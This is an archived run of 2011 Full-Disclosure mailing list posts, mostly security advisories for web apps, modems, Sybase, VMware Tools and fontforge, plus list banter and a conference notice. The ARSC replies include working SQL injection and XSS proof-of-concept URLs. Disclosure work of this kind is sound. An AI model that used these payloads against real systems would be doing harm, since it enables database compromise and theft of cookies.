Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)
On Wed, Jun 01, 2011 at 02:10:13PM +0200, advis...@htbridge.ch wrote: Vulnerability ID: HTB22999 Reference: http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html Product: A Really Simple Chat (ARSC) Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) Vulnerable Version: 3.3-rc2 Vendor Notification: 12 May 2011 Vulnerability Type: SQL Injection Risk level: High Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: The vulnerability exists due to failure in the /base/admin/edit_user.php script to properly sanitize user-supplied input in user variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. The following PoC is available: http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202 The vulnerability exists due to failure in the /base/admin/edit_layout.php script to properly sanitize user-supplied input in arsc_layout_id variable. The following PoC is available: http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 The vulnerability exists due to failure in the /base/admin/edit_room.php script to properly sanitize user-supplied input in arsc_room variable. The following PoC is available: http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202 These issues can be refered as: CVE-2011-2181. Could you please update www-site advisory? Best regards, Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)
On Wed, Jun 01, 2011 at 02:10:31PM +0200, advis...@htbridge.ch wrote: Vulnerability ID: HTB22997 Reference: http://www.htbridge.ch/advisory/xss_in_a_really_simple_chat_arsc.html Product: A Really Simple Chat (ARSC) Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) Vulnerable Version: 3.3-rc2 Vendor Notification: 12 May 2011 Vulnerability Type: XSS (Cross Site Scripting) Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the dereferer.php script to properly sanitize user-supplied input in arsc_link variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based auwhentication credentials, disclosure or modification of sensitive data. The following PoC is available: http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E This can be refered as CVE-2011-2180. Could you please update your www-site advisory? Best regards, Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What are some of the top ...
On Thu, Jun 02, 2011 at 03:29:01PM -0700, t0hitsugu wrote: While I make no claims of being a security professional, the abolute best thing you can do is look into schools that will lead to the prestigious CEH certification, highly vaued in the infosec community, which will teach you to use complex tools like sqlmap, nmap, and if youre skilled enough, metasploit. i suppose the current measure for eliteness is #CVEs(R) per second :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What are some of the top ...
1) Fix CVSS from disastrously broken to slightly broken or better 2) eliteness = #CVE* avg CVSS /sec + coolpoints 3) eliteness *= (taking credit for other people's vulns and known issues) ? 0 : 1 On Fri, Jun 3, 2011 at 6:28 AM, Georgi Guninski gunin...@guninski.com wrote: On Thu, Jun 02, 2011 at 03:29:01PM -0700, t0hitsugu wrote: While I make no claims of being a security professional, the abolute best thing you can do is look into schools that will lead to the prestigious CEH certification, highly vaued in the infosec community, which will teach you to use complex tools like sqlmap, nmap, and if youre skilled enough, metasploit. i suppose the current measure for eliteness is #CVEs(R) per second :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-171: Sybase OneBridge Mobile Data Suite Format String Remore Code Execution Vulnerability
ZDI-11-171: Sybase OneBridge Mobile Data Suite Format String Remore Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-171 June 3, 2011 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Sybase -- Affected Products: Sybase OneBridge -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11288. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sybase OneBridge Mobile Data Suite. Authentication is not required to exploit this vulnerability. The specific flaw exists within the iMailGatewayService server process (ECTrace.dll) which listens for encrypted requests by default on TCP port 993 (IMAP) and port 587 (SMTP). The process fails to properly sanitize malformed user string inputs before passing to the authentication logging function. By providing a specially crafted string with format specifiers this can be leveraged to trigger a format string vulnerability which can lead to arbitrary code execution in the context of the server process. -- Vendor Response: Sybase has issued an update to correct this vulnerability. More details can be found at: http://www.sybase.com/detail?id=1092074 -- Disclosure Timeline: 2011-01-21 - Vulnerability reported to vendor 2011-06-03 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Luigi Auriemma -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMware Tools Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146 Reference: http://www.vsecurity.com/resources/advisory/20110603-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: VMware Tools is a suite of utilities that enhances the performance of the virtual machine's guest operating system and improves management of the virtual machine. Without VMware Tools installed in your guest operating system, guest performance lacks important functionality. Vulnerability Overview - -- On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed. Product Background - -- VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools. Vulnerability Details - - CVE-2011-2146: The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify if a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions. CVE-2011-1787: The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest. CVE-2011-2145: The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected. Versions Affected - - VMware's advisory [2] indicates the following product versions are affected: VMware Product Running Replace with/ Product Version on Apply Patch = === = vCenter any Windows not affected Workstation 7.1.x Linux 7.1.4 or later* Workstation 7.1.x Windows 7.1.4 or later* Player 3.1.x Linux 3.1.4 or later* Player 3.1.x Windows 3.1.4 or later* AMS any any not affected Fusion 3.1.x OSX Fusion 3.1.3 or later* ESXi4.1 ESXiESXi410-201104402-BG* ESXi4.0 ESXiESXi400-201104402-BG* ESXi3.5 ESXiESXe350-201105402-T-SG* ESX 4.1 ESX ESX410-201104401-SG* ESX 4.0 ESX ESX400-201104401-SG* ESX 3.5 ESX ESX350-201105406-SG* ESX 3.0.3 ESX not affected The open-vm-tools package prior to version 2011.02.23-368700 is also affected. Vendor Response - --- The following timeline details VMware's response to the reported issue: 2011-02-17VMware receives initial vulnerability report 2011-02-17VMware security team acknowledges receipt 2011-03-04VMware provides status update 2011-03-04VSR initiates discussion of disclosure date 2011-03-10VMware responds, indicates internal coordination underway 2011-03-11VSR
[Full-disclosure] New CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
Hello list! I want to warn you about security vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router). These are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities. Which I've found in your modem. In April I've already drew attention of Ukrtelecom's representative (and this modem was bough at Ukrtelecom) about multiple vulnerabilities in this model of Callisto modems (and other models also could be affected). SecurityVulns ID: 11700. - Affected products: - Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other firmware and also other models of Callisto also must be vulnerable. -- Details: -- These attacks should be conducted on modem owner, which is logged into control panel. Taking into account that it's unlikely to catch him in this state, then it's possible to use before-mentioned vulnerabilities (http://websecurity.com.ua/5161/) for conducting of remote login (for logining him into control panel). After that it's possible to conduct CSRF or XSS attack. CSRF (WASC-09): This vulnerability allows to add DNS server in modem's settings. Which allows to conduct spoofing, phishing and DNS Rebinding attacks on users, which go to Internet via this modem. http://websecurity.com.ua/uploads/2011/Callisto%20821+%20CSRF8.html XSS (WASC-08): In this form there are also 3 persistent XSS vulnerabilities. http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS10.html In this case the code will be executed immediately, and also at visiting of pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html. http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS11.html In this case the code will be executed immediately, and also at visiting of pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html. http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS12.html In this case the code will be executed immediately, and also at visiting of pages http://192.168.1.1/system/events.html and http://192.168.1.1/shared/event_log_selection.html. Timeline: 2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems, which they give (sell) to their clients. 2011.05.31 - disclosed at my site. 2011.06.01 - informed developers (Iskratel). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5182/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Warning is about vulnerability
Hello is list!! I is like to warn you is about vulnerability. Is vulnerability is what get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is watch vulnerabilities and is never forgot when is you use !! many times, is many more take your advisories is serious!! http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/ -- `I am epic win` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fastweb MyFastpage Authentication Bypass
Fastweb, an Italian service provider, have a XSS flaw that permits to bypass authentication and log into users account control panels. The attacker must lure Fastweb users into a malicious web page to steal authentication token with XSS. The control panels called MyFastPage permits to change Fastweb account password, FastMail password, on line billing, configure home lan portmapping, private datas, address and billing informations, and buy additional services charging cost to the user. Here the working POC [italian]: http://disse.cting.org/codes/fastweb.html Here the blog article [italian]: http://disse.cting.org/security-2/fastweb-myfastpage-panel-control-hack/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2253-1] fontforge security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2253-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst June 3, 2011 http://www.debian.org/security/faq - - Package: fontforge Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2010-4259 Debian Bug : 605537 Ulrik Persson reported a stack-based buffer overflow flaw in FontForge, a font editor. When processed a crafted Bitmap Distribution Format (BDF) FontForge could crash or execute arbitrary code with the privileges of the user running FontForge. For the oldstable distribution (lenny), this problem has been fixed in version 0.0.20080429-1+lenny2. For the stable distribution (squeeze), testing distribution (wheezy), and unstable distribution (sid) are not affected by this problem. We recommend that you upgrade your fontforge packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJN6TbqAAoJEOxfUAG2iX57sXUH/jq43XDXkz8o03rw2Xm7kvnX VGIrbvo3RGEZ2Pg2fNSIGx1F4MeuMrwA5+dm46mGqYzHvV54+aexIvY1b8bLJ/B3 YmNw0iQa5SSS4zFW+4vDAc5+UI/NqL6EsStdlELdBW0cXNaIUofxCnFl9SUuWb7z D9Btrc09mfYs44VrarYm1YaOTT9NexIQzadvaLAHOwRuAR6mK3YrKcQhuR2Hblz6 ObMXTHaGpmHXCQx9nRPMDr2I/oA0ipiu7N9wzELs/Z2eiKda2Xhq0t+CqRjIOH5c r0GAxZxHOlqwfBh3ouPlBaTLlltvHN7jsLG6Ojf1f/S6D88mkpIi88Mkj4wElNo= =bA8W -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Warning is about vulnerability
You are the Borat of FD. 2011/6/4 Григорий Братислава musntl...@gmail.com Hello is list!! I is like to warn you is about vulnerability. Is vulnerability is what get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is watch vulnerabilities and is never forgot when is you use !! many times, is many more take your advisories is serious!! http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/ -- `I am epic win` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AppSec USA 2011 CFP Reminder, CTF Pre-Conference Challenge #2
Hello netizens! This is an update about the OWASP AppSec USA 2011 software security conference in Minneapolis this September. CALL FOR PAPERS Have something important to say about software security? The OWASP AppSec USA 2011 Call for Papers is still open. We're looking for hardcore talks in cloud security, mobile security, new attacks defenses, and straight up software development platforms. Get your submission in before time runs out. And have your developer friends submit a talk! http://www.appsecusa.org/talks.html The AppSec USA 2011 talks will be delivered September 22-23, 2011 in Minneapolis, Minnesota. In addition to the talks, we'll have excellent keynotes like Moxie Marlinspike. CAPTURE THE FLAG PRE-CONFERENCE CHALLENGE #2 Last month *ChrisKarel* won pre-conference challenge #1 for a pass to the OWASP AppSec USA 2011 talks. Congratulations, ChrisKarel! For June, we're back with another chance for you to score a free conference pass and get a feel for the AppSec USA 2011 CTF challenges coming this September. Good luck. http://www.appsecusa.org/ctf.html TRAINING We have awesome training at a fair price. Register for mobile security, penetration testing, secure coding, and attack detection and response courses being held September 20-21. Hurry before classes fill up. http://www.appsecusa.org/training.html MORE APPSEC USA 2011 Check out www.appsecusa.org for other events including a 5K / 10K charity run, the first ever Women in AppSec grant, and a chance to have your own original music played at the conference. Thanks to our wonderful supporters - check them out at www.appsecusa.org! -- Adam Baso OWASP AppSec USA 2011: Your life is in the cloud. September 20-23 Training, Talks, CTF, Showroom, and More www.appsecusa.org @appsecusa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/